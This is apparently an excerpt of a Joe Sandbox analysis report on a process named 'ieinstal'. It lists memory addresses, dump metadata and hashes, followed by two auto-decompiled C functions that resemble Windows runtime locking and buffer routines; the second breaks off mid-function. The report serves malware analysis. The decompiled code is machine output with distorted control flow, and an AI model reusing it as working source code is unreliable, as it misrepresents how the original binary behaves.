                        0x1ed24555
                        0x1ed24559
                        0x1ed2455d
                        0x1ed6e26d
                        0x1ed6e270
                        0x1ed6e274
                        0x1ed6e27a
                        0x1ed6e27d
                        0x1ed6e28e
                        0x1ed6e28e
                        0x1ed24563
                        0x1ed24563
                        0x1ed24569
                        0x1ed24569
                        0x00000000
                        0x1ed2455d
                        0x1ed2450f
                        0x00000000
                        0x1ed244f3
                        0x1ed243ff
                        0x1ed24405
                        0x1ed24405
                        0x1ed24405
                        0x1ed242ac
                        0x1ed2428c
                        0x1ed24282
                        0x1ed24407
                        0x1ed2440d
                        0x1ed6e2af
                        0x1ed6e2af
                        0x1ed24413
                        0x1ed24413
                        0x00000000
                        0x1ed241d4
                        0x00000000
                        0x1ed241c3
                        0x1ed241bd
                        0x1ed24415
                        0x1ed24415
                        0x1ed24416
                        0x1ed24417
                        0x1ed24429
                        0x1ed2416e
                        0x1ed2416e
                        0x1ed24175
                        0x1ed24498
                        0x1ed2449f
                        0x1ed6e12d
                        0x00000000
                        0x1ed6e133
                        0x00000000
                        0x1ed6e133
                        0x1ed244a5
                        0x1ed244a5
                        0x1ed244aa
                        0x00000000
                        0x1ed244bb
                        0x1ed244ca
                        0x1ed244d6
                        0x1ed244d7
                        0x1ed244d8
                        0x1ed244e3
                        0x1ed244e3
                        0x1ed244aa
                        0x1ed2417b
                        0x1ed2417b
                        0x1ed2417b
                        0x00000000
                        0x1ed2417b
                        0x1ed24175
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1842fe399071fa3c3f93a40f8b78b6cf7f386a8ad86d4b31b585c643b88f33f
                        • Instruction ID: 78272e2fa80525723b54b36a9dd443015f84e45132cecde4e1f87b4f55c8ff72
                        • Opcode Fuzzy Hash: e1842fe399071fa3c3f93a40f8b78b6cf7f386a8ad86d4b31b585c643b88f33f
                        • Instruction Fuzzy Hash: EFF17F749082528FC714CF15C590A2AB7F2FF88718F958A2EF8C6CB290E774D991CB52
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED320A0, Relevance: .4, Instructions: 420COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 92%
                        			E1ED320A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x1edf8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E1ED32EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E1ED32EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E1ED058EC(_t240);
									_t221 =  *0x1edf5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x1edf5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E1ED44A2C(0x1edf6e40, 0x1ed44b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E1ED27D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x1ece5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E1ED3F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E1ED3F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E1ED87016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L1ED22400(_t267 + 0x20);
															}
															L1ED22400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E1ED32397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E1ED22280(_t134, 0x1edf8608);
									__eflags =  *0x1edf6e48 - _t253; // 0x30115b8
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E1ED1FFB0(_t198, _t241, 0x1edf8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L1ED277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x1edf6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x1edf8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
										L92:
										_t133 = E1ED36B90(_t210,  &_v64);
										_t262 =  *0x1edf8608; // 0x0
										L93:
										_t231 = _t262;
										continue;
									}
									_t240 = _v56;
									goto L10;
									L76:
									_t169 = E1ED3E180(_t133);
									__eflags = _t169;
									if(_t169 != 0) {
										_push(0xc000004b);
										_push(0xffffffff);
										E1ED497C0();
										_t231 = _v68;
									}
									_v72 = 0;
									_v24 =  *( *[fs:0x18] + 0x24);
									_v16 = 3;
									_v28 = 0;
									__eflags = _t231 & 0x00000002;
									if((_t231 & 0x00000002) == 0) {
										_v32 =  &_v36;
										_t174 = _t231 >> 4;
										__eflags = 1 - _t174;
										_v20 = _t174;
										asm("sbb ecx, ecx");
										_t210 = 3 |  &_v36;
										__eflags = _t174;
										if(_t174 == 0) {
											_v20 = 0xfffffffe;
										}
									} else {
										_v32 = 0;
										_v20 = 0xffffffff;
										_v36 = _t231 & 0xfffffff0;
										_t210 = _t231 & 0x00000008 |  &_v36 | 0x00000007;
										_v72 =  !(_t231 >> 2) & 0xffffff01;
									}
									asm("lock cmpxchg [edi], esi");
									_t262 = _t231;
									__eflags = _t262 - _t231;
									if(_t262 != _t231) {
										goto L92;
									} else {
										__eflags = _v72;
										if(_v72 != 0) {
											E1ED4006A(0x1edf8608, _t210);
										}
										__eflags =  *0x7ffe036a - 1;
										if(__eflags <= 0) {
											L89:
											_t133 =  &_v16;
											asm("lock btr dword [eax], 0x1");
											if(__eflags >= 0) {
												goto L93;
											} else {
												goto L90;
											}
											do {
												L90:
												_push(0);
												_push(0x1edf8608);
												E1ED4B180();
												_t133 = _v24;
												__eflags = _t133 & 0x00000004;
											} while ((_t133 & 0x00000004) == 0);
											goto L93;
										} else {
											_t218 =  *0x1edf6904; // 0x400
											__eflags = _t218;
											if(__eflags == 0) {
												goto L89;
											} else {
												goto L87;
											}
											while(1) {
												L87:
												__eflags = _v16 & 0x00000002;
												if(__eflags == 0) {
													goto L89;
												}
												asm("pause");
												_t218 = _t218 - 1;
												__eflags = _t218;
												if(__eflags != 0) {
													continue;
												}
												goto L89;
											}
											goto L89;
										}
									}
								}
							}
							L10:
							_t229 =  *0x1edf6e48; // 0x30115b8
							_v72 = _t229;
							if(_t229 == 0 ||  *((char*)(_t229 + 0x40)) == 0 &&  *((intOrPtr*)(_t229 + 0x38)) !=  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x294))) {
								E1ED1FFB0(_t198, _t240, 0x1edf8608);
								_t253 = _v76;
								goto L29;
							} else {
								 *((intOrPtr*)(_t229 + 0x34)) =  *((intOrPtr*)(_t229 + 0x34)) + 1;
								asm("lock cmpxchg [esi], ecx");
								_t215 = 1;
								if(1 != 1) {
									while(1) {
										_t246 = _t215 & 0x00000006;
										_t180 = _t215;
										__eflags = _t246 - 2;
										_v56 = _t246;
										_t235 = (0 | _t246 == 0x00000002) * 4 - 1 + _t215;
										asm("lock cmpxchg [edi], esi");
										_t248 = _v56;
										__eflags = _t180 - _t215;
										if(_t180 == _t215) {
											break;
										}
										_t215 = _t180;
									}
									__eflags = _t248 - 2;
									if(_t248 == 2) {
										__eflags = 0;
										E1ED400C2(0x1edf8608, 0, _t235);
									}
									_t229 = _v72;
								}
								goto L14;
							}
						}
					}
				}
				_t227 = 0;
				_v75 = 0;
				if(_t128 != 0) {
					goto L4;
				}
				goto L2;
			}











































































                        0x1ed320a0
                        0x1ed320a8
                        0x1ed320ad
                        0x1ed320b3
                        0x1ed320b8
                        0x1ed320c2
                        0x1ed320c7
                        0x1ed320cb
                        0x1ed320d2
                        0x1ed32263
                        0x1ed32266
                        0x1ed75836
                        0x1ed75836
                        0x00000000
                        0x1ed3226c
                        0x1ed3226c
                        0x1ed32270
                        0x1ed32274
                        0x1ed320e2
                        0x1ed320e2
                        0x1ed320e6
                        0x1ed320ee
                        0x1ed757dc
                        0x1ed757de
                        0x1ed757ec
                        0x1ed757ec
                        0x1ed757f1
                        0x1ed757f3
                        0x1ed757f8
                        0x00000000
                        0x1ed757f8
                        0x1ed757e0
                        0x1ed757e4
                        0x1ed757ea
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed757ea
                        0x1ed320f4
                        0x1ed320f4
                        0x1ed320f8
                        0x1ed320f8
                        0x1ed320fc
                        0x1ed32100
                        0x1ed32106
                        0x1ed32201
                        0x1ed32206
                        0x1ed3220b
                        0x1ed3220e
                        0x1ed322a9
                        0x1ed322ac
                        0x00000000
                        0x00000000
                        0x1ed322b2
                        0x1ed322b5
                        0x1ed75801
                        0x1ed75806
                        0x00000000
                        0x00000000
                        0x1ed75810
                        0x1ed75815
                        0x1ed75818
                        0x00000000
                        0x00000000
                        0x1ed7581e
                        0x1ed322bb
                        0x1ed322bb
                        0x1ed32218
                        0x1ed32218
                        0x1ed3221c
                        0x1ed32220
                        0x1ed32222
                        0x1ed322c2
                        0x1ed322c4
                        0x1ed322dc
                        0x1ed322dc
                        0x1ed322e1
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed322e7
                        0x1ed322c8
                        0x1ed322cd
                        0x1ed322d3
                        0x1ed322d6
                        0x1ed75823
                        0x1ed75825
                        0x1ed75827
                        0x00000000
                        0x00000000
                        0x1ed7582d
                        0x00000000
                        0x1ed7582d
                        0x00000000
                        0x1ed32228
                        0x1ed32228
                        0x00000000
                        0x1ed32228
                        0x1ed32222
                        0x1ed32214
                        0x1ed32214
                        0x00000000
                        0x1ed32114
                        0x1ed32114
                        0x1ed32114
                        0x1ed3211a
                        0x1ed3211c
                        0x1ed32348
                        0x1ed3234d
                        0x1ed75840
                        0x1ed75845
                        0x1ed75848
                        0x1ed7584e
                        0x1ed7584e
                        0x1ed75848
                        0x1ed32353
                        0x1ed32355
                        0x1ed32388
                        0x1ed32388
                        0x1ed32368
                        0x1ed3236a
                        0x1ed3236c
                        0x1ed3238f
                        0x00000000
                        0x1ed3236e
                        0x1ed3236e
                        0x1ed3218e
                        0x1ed3218e
                        0x1ed32191
                        0x1ed32195
                        0x1ed75a03
                        0x1ed75a06
                        0x1ed75a0c
                        0x1ed75a0f
                        0x1ed75a11
                        0x1ed75a13
                        0x1ed75a13
                        0x1ed75a19
                        0x1ed75a1f
                        0x00000000
                        0x1ed3219b
                        0x1ed3219b
                        0x1ed321a0
                        0x1ed32282
                        0x1ed32284
                        0x1ed32284
                        0x1ed32284
                        0x1ed32284
                        0x1ed321a6
                        0x1ed321a9
                        0x1ed321ac
                        0x1ed321ae
                        0x1ed321b3
                        0x1ed3228b
                        0x1ed32290
                        0x1ed32379
                        0x1ed32296
                        0x1ed32298
                        0x1ed32298
                        0x1ed32290
                        0x1ed321b9
                        0x1ed321be
                        0x1ed322a2
                        0x1ed322a2
                        0x1ed321c4
                        0x1ed321c8
                        0x1ed321cc
                        0x1ed321d0
                        0x1ed321d4
                        0x1ed321de
                        0x1ed321e3
                        0x1ed75a29
                        0x1ed75a2c
                        0x00000000
                        0x00000000
                        0x1ed75a3b
                        0x00000000
                        0x1ed321e9
                        0x1ed321e9
                        0x1ed321e9
                        0x1ed321ee
                        0x1ed321f1
                        0x1ed75a45
                        0x1ed75a4b
                        0x1ed75a52
                        0x1ed75a58
                        0x1ed75a5d
                        0x1ed75a5f
                        0x1ed75a71
                        0x1ed75a61
                        0x1ed75a6a
                        0x1ed75a6a
                        0x1ed75a76
                        0x1ed75a79
                        0x1ed75a7f
                        0x1ed75a83
                        0x1ed75a85
                        0x1ed75a87
                        0x1ed75a87
                        0x1ed75a8c
                        0x1ed75a91
                        0x1ed75a97
                        0x1ed75a9f
                        0x1ed75aa0
                        0x1ed75aa1
                        0x1ed75aa6
                        0x1ed75aab
                        0x1ed75ab1
                        0x1ed75ab3
                        0x1ed75ab9
                        0x1ed75aca
                        0x1ed75ad4
                        0x1ed75ad4
                        0x1ed75ade
                        0x1ed75ade
                        0x1ed75aab
                        0x1ed75a79
                        0x1ed75a52
                        0x1ed321f7
                        0x1ed321f9
                        0x1ed321fe
                        0x1ed321fe
                        0x1ed321e3
                        0x1ed32195
                        0x1ed3236c
                        0x1ed32122
                        0x1ed32122
                        0x1ed32124
                        0x1ed32231
                        0x1ed32236
                        0x1ed32236
                        0x1ed32238
                        0x1ed32238
                        0x1ed32240
                        0x1ed32242
                        0x1ed32244
                        0x1ed759fc
                        0x1ed3218c
                        0x1ed3218c
                        0x00000000
                        0x1ed3218c
                        0x1ed3224a
                        0x1ed3224f
                        0x1ed32256
                        0x1ed32304
                        0x1ed32309
                        0x1ed3230f
                        0x1ed3231e
                        0x1ed3231e
                        0x1ed3231e
                        0x1ed32320
                        0x1ed32325
                        0x1ed3232a
                        0x1ed3232c
                        0x1ed3233e
                        0x1ed3233e
                        0x00000000
                        0x1ed3232c
                        0x1ed32311
                        0x1ed32317
                        0x1ed3231a
                        0x1ed3231c
                        0x1ed32380
                        0x1ed32380
                        0x1ed32380
                        0x1ed32384
                        0x00000000
                        0x00000000
                        0x1ed32386
                        0x00000000
                        0x1ed3231c
                        0x1ed3225c
                        0x1ed3225c
                        0x00000000
                        0x1ed3225c
                        0x1ed3212a
                        0x1ed32134
                        0x1ed32138
                        0x1ed3213d
                        0x1ed75858
                        0x1ed75863
                        0x1ed75863
                        0x1ed75867
                        0x1ed7586a
                        0x00000000
                        0x00000000
                        0x1ed7586c
                        0x1ed7586c
                        0x1ed75871
                        0x1ed75875
                        0x1ed75877
                        0x1ed75997
                        0x1ed7599c
                        0x1ed759a1
                        0x1ed759a7
                        0x1ed759a7
                        0x00000000
                        0x1ed759a7
                        0x1ed7587d
                        0x00000000
                        0x1ed7588b
                        0x1ed7588b
                        0x1ed75890
                        0x1ed75892
                        0x1ed75894
                        0x1ed75899
                        0x1ed7589b
                        0x1ed758a0
                        0x1ed758a0
                        0x1ed758aa
                        0x1ed758b2
                        0x1ed758b6
                        0x1ed758be
                        0x1ed758c6
                        0x1ed758c9
                        0x1ed7590d
                        0x1ed75917
                        0x1ed7591a
                        0x1ed7591c
                        0x1ed75920
                        0x1ed75928
                        0x1ed7592a
                        0x1ed7592c
                        0x1ed7592e
                        0x1ed7592e
                        0x1ed758cb
                        0x1ed758cd
                        0x1ed758d8
                        0x1ed758e0
                        0x1ed758f4
                        0x1ed758fe
                        0x1ed758fe
                        0x1ed7593a
                        0x1ed7593e
                        0x1ed75940
                        0x1ed75942
                        0x00000000
                        0x1ed75944
                        0x1ed75944
                        0x1ed75949
                        0x1ed7594e
                        0x1ed7594e
                        0x1ed75953
                        0x1ed7595b
                        0x1ed75976
                        0x1ed75976
                        0x1ed7597a
                        0x1ed7597f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed75981
                        0x1ed75981
                        0x1ed75981
                        0x1ed75983
                        0x1ed75988
                        0x1ed7598d
                        0x1ed75991
                        0x1ed75991
                        0x00000000
                        0x1ed7595d
                        0x1ed7595d
                        0x1ed75963
                        0x1ed75965
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed75967
                        0x1ed75967
                        0x1ed7596b
                        0x1ed7596d
                        0x00000000
                        0x00000000
                        0x1ed7596f
                        0x1ed75971
                        0x1ed75971
                        0x1ed75974
                        0x00000000
                        0x00000000
                        0x00000000
                        0x1ed75974
                        0x00000000
                        0x1ed75967
                        0x1ed7595b
                        0x1ed75942
                        0x1ed75863
                        0x1ed32143
                        0x1ed32143
                        0x1ed32149
                        0x1ed3214f
                        0x1ed322f1
                        0x1ed322f6
                        0x00000000
                        0x1ed32173
                        0x1ed32173
                        0x1ed3217d
                        0x1ed32181
                        0x1ed32186
                        0x1ed759ae
                        0x1ed759b2
                        0x1ed759b5
                        0x1ed759b7
                        0x1ed759ba
                        0x1ed759cd
                        0x1ed759d1
                        0x1ed759d5
                        0x1ed759d9
                        0x1ed759db
                        0x00000000
                        0x00000000
                        0x1ed759dd
                        0x1ed759dd
                        0x1ed759e1
                        0x1ed759e4
                        0x1ed759e7
                        0x1ed759ee
                        0x1ed759ee
                        0x1ed759f3
                        0x1ed759f3
                        0x00000000
                        0x1ed32186
                        0x1ed3214f
                        0x1ed32106
                        0x1ed32266
                        0x1ed320d8
                        0x1ed320da
                        0x1ed320e0
                        0x00000000
                        0x00000000
                        0x00000000

                        Memory Dump Source
                        • Source File: 00000012.00000002.606394745.000000001ECE0000.00000040.00000001.sdmp, Offset: 1ECE0000, based on PE: true
                        • Associated: 00000012.00000002.607068515.000000001EDFB000.00000040.00000001.sdmp Download File
                        • Associated: 00000012.00000002.607157751.000000001EDFF000.00000040.00000001.sdmp Download File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_18_2_1ece0000_ieinstal.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a67429dc4e0a54c16b69202d308d235fed5f595fc902f3d67a15134e583d872a
                        • Instruction ID: 6dd9809843442b4ab735aa06775f54c5cc11445754fbd07ac4561a35036b2a83
                        • Opcode Fuzzy Hash: a67429dc4e0a54c16b69202d308d235fed5f595fc902f3d67a15134e583d872a
                        • Instruction Fuzzy Hash: 69F106B5E083C29FD711CF25C95074AB7E2AF85B19F648B1DE8958B280D734E841CB93
                        Uniqueness

                        Uniqueness Score: -1.00%

                        Function 1ED1D5E0, Relevance: .4, Instructions: 353COMMONCrypto
                        Download Yara Rule
                        C-Code - Quality: 87%
                        			E1ED1D5E0(signed int _a4, signed int _a8, signed int _a12, intOrPtr* _a16, signed int _a20, signed int _a24) {
				signed int _v8;
				intOrPtr _v20;
				signed int _v36;
				intOrPtr* _v40;
				signed int _v44;
				signed int _v48;
				signed char _v52;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				intOrPtr _v80;
				signed int _v84;
				intOrPtr _v100;
				intOrPtr _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				intOrPtr _v120;
				signed int _v132;
				char _v140;
				char _v144;
				char _v157;
				signed int _v164;
				signed int _v168;
				signed int _v169;
				intOrPtr _v176;
				signed int _v180;
				signed int _v184;
				intOrPtr _v188;
				signed int _v192;
				signed int _v200;
				signed int _v208;
				intOrPtr* _v212;
				char _v216;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t204;
				signed int _t206;
				void* _t208;
				signed int _t211;
				signed int _t216;
				intOrPtr _t217;
				intOrPtr* _t218;
				signed int _t226;
				signed int _t239;
				signed int* _t247;
				signed int _t249;
				void* _t252;
				signed int _t256;
				signed int _t269;
				signed int _t271;
				signed int _t277;
				signed int _t279;
				intOrPtr _t283;
				signed int _t287;
				signed int _t288;
				void* _t289;
				signed char _t290;
				signed int _t292;
				signed int* _t293;
				unsigned int _t297;
				signed int _t306;
				signed int _t307;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				intOrPtr _t311;
				intOrPtr _t312;
				signed int _t319;
				signed int _t320;
				signed int* _t324;
				signed int _t337;
				signed int _t338;
				signed int _t339;
				signed int* _t340;
				void* _t341;
				signed int _t344;
				signed int _t348;
				signed int _t349;
				signed int _t351;
				intOrPtr _t353;
				void* _t354;
				signed int _t356;
				signed int _t358;
				intOrPtr _t359;
				signed int _t361;
				signed int _t363;
				signed short* _t365;
				void* _t367;
				intOrPtr _t369;
				void* _t370;
				signed int _t371;
				signed int _t372;
				void* _t374;
				signed int _t376;
				void* _t384;
				signed int _t387;

				_v8 =  *0x1edfd360 ^ _t376;
				_t2 =  &_a20;
				 *_t2 = _a20 & 0x00000001;
				_t287 = _a4;
				_v200 = _a12;
				_t365 = _a8;
				_v212 = _a16;
				_v180 = _a24;
				_v168 = 0;
				_v157 = 0;
				if( *_t2 != 0) {
					__eflags = E1ED16600(0x1edf52d8);
					if(__eflags == 0) {
						goto L1;
					} else {
						_v188 = 6;
					}
				} else {
					L1:
					_v188 = 9;
				}
				if(_t365 == 0) {
					_v164 = 0;
					goto L5;
				} else {
					_t363 =  *_t365 & 0x0000ffff;
					_t341 = _t363 + 1;
					if((_t365[1] & 0x0000ffff) < _t341) {
						L109:
						__eflags = _t341 - 0x80;
						if(_t341 <= 0x80) {
							_t281 =  &_v140;
							_v164 =  &_v140;
							goto L114;
						} else {
							_t283 =  *0x1edf7b9c; // 0x0
							_t281 = L1ED24620(_t341,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t283 + 0x180000, _t341);
							_v164 = _t281;
							__eflags = _t281;
							if(_t281 != 0) {
								_v157 = 1;
								L114:
								E1ED4F3E0(_t281, _t365[2], _t363);
								_t200 = _v164;
								 *((char*)(_v164 + _t363)) = 0;
								goto L5;
							} else {
								_t204 = 0xc000009a;
								goto L47;
							}
						}
					} else {
						_t200 = _t365[2];
						_v164 = _t200;
						if( *((char*)(_t200 + _t363)) != 0) {
							goto L109;
						} else {
							while(1) {
								L5:
								_t353 = 0;
								_t342 = 0x1000;
								_v176 = 0;
								if(_t287 == 0) {
									break;
								}
								_t384 = _t287 -  *0x1edf7b90; // 0x77df0000
								if(_t384 == 0) {
									_t353 =  *0x1edf7b8c; // 0x2fb2c08
									_v176 = _t353;
									_t320 = ( *(_t353 + 0x50))[8];
									_v184 = _t320;
								} else {
									E1ED22280(_t200, 0x1edf84d8);
									_t277 =  *0x1edf85f4;
									_t351 =  *0x1edf85f8 & 1;
									while(_t277 != 0) {
										_t337 =  *(_t277 - 0x50);
										if(_t337 > _t287) {
											_t338 = _t337 | 0xffffffff;
										} else {
											asm("sbb ecx, ecx");
											_t338 =  ~_t337;
										}
										_t387 = _t338;
										if(_t387 < 0) {
											_t339 =  *_t277;
											__eflags = _t351;
											if(_t351 != 0) {
												__eflags = _t339;
												if(_t339 == 0) {
													goto L16;
												} else {
													goto L118;
												}
												goto L151;
											} else {
												goto L16;
											}
											goto L17;
										} else {
											if(_t387 <= 0) {
												__eflags = _t277;
												if(_t277 != 0) {
													_t340 =  *(_t277 - 0x18);
													_t24 = _t277 - 0x68; // 0x2fb3c68
													_t353 = _t24;
													_v176 = _t353;
													__eflags = _t340[3] - 0xffffffff;
													if(_t340[3] != 0xffffffff) {
														_t279 =  *_t340;
														__eflags =  *(_t279 - 0x20) & 0x00000020;
														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
															asm("lock inc dword [edi+0x9c]");
															_t340 =  *(_t353 + 0x50);
														}
													}
													_v184 = _t340[8];
												}
											} else {
												_t339 =  *(_t277 + 4);
												if(_t351 != 0) {
													__eflags = _t339;
													if(_t339 == 0) {
														goto L16;
